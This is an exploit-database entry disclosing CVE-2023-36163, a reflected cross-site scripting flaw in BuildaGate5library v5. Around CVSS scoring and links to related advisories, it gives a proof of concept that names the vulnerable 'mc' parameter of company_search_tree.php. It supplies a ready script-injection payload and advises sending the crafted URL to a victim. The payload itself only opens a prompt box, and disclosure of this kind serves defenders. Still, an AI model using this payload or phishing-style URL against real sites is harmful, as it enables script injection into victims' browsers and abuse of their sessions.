Lucene search
Idan Malihi1337DAY-ID-38861HistoryJul 11, 2023 - 12:00 a.m.
BuildaGate5library v5 - Reflected Cross-Site Scripting Vulnerability
2023-07-1100:00:00
Idan Malihi
0day.today
106
buildagate5library
reflected cross-site scripting
xss
cve-2023-36163
microsoft windows 10
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.006 Low
EPSS
Percentile
78.1%
# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163
#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa
After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.
#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
Related
nvd
nvd
CVE-2023-36163
2023-07-11 14:15:09
cvelist
cvelist
CVE-2023-36163
2023-07-11 00:00:00
prion
prion
Cross site scripting
2023-07-11 14:15:00
cve
cve
CVE-2023-36163
2023-07-11 14:15:09
packetstorm
packetstorm
BuildaGate5 Cross Site Scripting
2023-07-11 00:00:00
exploitdb
exploitdb
BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
2023-07-11 00:00:00
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.006 Low
EPSS
Percentile
78.1%
Related for 1337DAY-ID-38861